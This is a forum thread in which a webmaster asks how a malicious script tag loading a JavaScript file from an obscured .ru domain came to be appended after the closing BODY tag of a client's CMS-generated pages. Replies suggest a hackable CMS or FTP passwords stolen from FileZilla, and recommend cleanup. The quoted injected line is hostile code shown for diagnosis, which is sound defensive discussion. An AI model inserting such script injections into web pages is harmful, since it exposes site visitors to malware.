1. Home
  2. Forums Index
  3. WebmasterWorld / Webmaster General 11:26 am May 21, 2026

Forum Moderators: phranque

Message Too Old, No Replies

Malware alert from Google

Try to find out from where

         

jetteroheller

9:35 pm on Aug 22, 2010 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Just received 2 malware alerts from Google.

Both domains are from one of my clients.
My client is just right now on holiday
so I can not check his computer.

In all cases at the end of the HTML file after the </BODY>
appears:

<script type="text/javascript" src="http://******.ru/Base_Station.js"></script>
<!--87dbfb1e3d8895fc7e5012f8de4337d0-->

All the files are created by my own CMS
my client works with the CMS

So there are this theories:

1) Malware checks on my clients computers all stroed *.htm files and attaches the script
2) FTP program is infected and attaches script
3) on the way to the server
4) The server is infected

What is most realistic of this theories?

[edited by: tedster at 10:04 pm (utc) on Aug 22, 2010]
[edit reason] obscure the malware domain [/edit]

lammert

9:57 pm on Aug 22, 2010 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



5) Your CMS software is hackable. It wouldn't be the first CMS system which can be compromised. Is it flat file based or scripts with an SQL database?

Independent of the source of the infection, it may not have been a wise idea to publish the malware URL here. People might innocently copy and paste it in their address bar of their browser and get infected.

encyclo

10:09 pm on Aug 22, 2010 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Another possibility is that you or the client has malware on your/their machine and your Filezilla passwords have been swiped. (Filezilla stored passwords in a plain-text file in a know location, so it easily targeted).

If this is the case, clean up everything locally first, change all passwords for all sites stored in Filezilla, and upload from safe backups.

jetteroheller

6:20 am on Aug 23, 2010 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



My CMS ist written in PERL as HTA Hyper Text Application with MSIE as GUI. It's used by less than 20 users.

My CMS creates all the html files local on the own computer.
Only by FTP communication with the server.

My CMS uses MoveItFreely as FTP to transfer the files to the server.
 

Join The Conversation

Moderators and Top Contributors

Hot Threads This Week

  1. Home
  2. Forums Index
  3. WebmasterWorld / Webmaster General 11:26 am May 21, 2026